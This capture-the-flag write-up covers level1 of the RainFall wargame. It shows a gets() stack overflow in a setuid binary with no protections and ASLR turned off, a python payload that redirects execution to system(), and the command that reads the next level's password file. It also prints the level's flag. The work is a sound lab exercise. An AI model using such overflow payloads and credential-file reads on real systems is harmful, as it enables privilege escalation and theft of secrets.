After login we see next information:
```
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   /home/user/level1/level1
```

Command: `ls -l`
```
total 8
-rwsr-s---+ 1 level2 users 5138 Mar  6  2016 level1
```

Using `objdump` and `radar` tools find out that there are two functions inside `main` and `run`.
![alt text](./Resources/main.png "main function")
![alt text](./Resources/run.png "run function")

As we can see, thanks to `gets` we can make buffer overflow and override return address.

Check that addresses randomization turned off.
```
level1@RainFall:~$ cat /proc/sys/kernel/randomize_va_space
0
```

Using `gdb` finding address of `system` function call inside `run` function.  
Command: `disas run`  
Output: `0x08048472`

So now I just make buffer overflow and override `ret` inside `main` function to the new address.

Prepare payload:  
Command: `python -c 'print "a"*76 + "\x72\x84\x04\x08" ' > /tmp/out`  

Run program. `-` flag for `cat` allowe to make `stdin` available for `system`.  
Command: `cat /tmp/out - | ./level1`  
Command: `cat /home/user/level2/.pass`

Flag: `53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77`